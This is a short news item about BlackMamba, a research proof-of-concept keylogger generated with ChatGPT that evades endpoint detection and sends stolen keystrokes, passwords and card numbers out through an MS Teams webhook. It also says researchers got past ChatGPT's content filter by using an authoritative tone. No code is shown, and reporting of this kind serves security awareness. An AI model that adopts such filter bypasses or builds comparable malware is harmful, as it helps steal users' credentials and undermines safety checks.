Jeff Sims, a researcher at the HYAS Institute and a cybersecurity guru, has created a brand-new form of ChatGPT-powered malware called Blackmamba that can get past Endpoint Detection and Response (EDR) filters. This should not be shocking since CyberArk cybersecurity researchers already reported on how ChatGPT might be exploited to create polymorphic malware in January of this year. Using an authoritative tone and getting through ChatGPT's content filtering, the researchers were able to produce the polymorphic malware during their examination. The malware can collect private information including usernames, debit/credit card numbers, passwords, and other secret data that a user enters into their device, according to the HYAS Institute's research (PDF). The data is then transferred to the attacker's Teams channel via Blackmamba using an MS Teams webhook, where it is "analysed, sold on the dark web, or utilised for other nefarious reasons," according to the research.
Read the full article here.

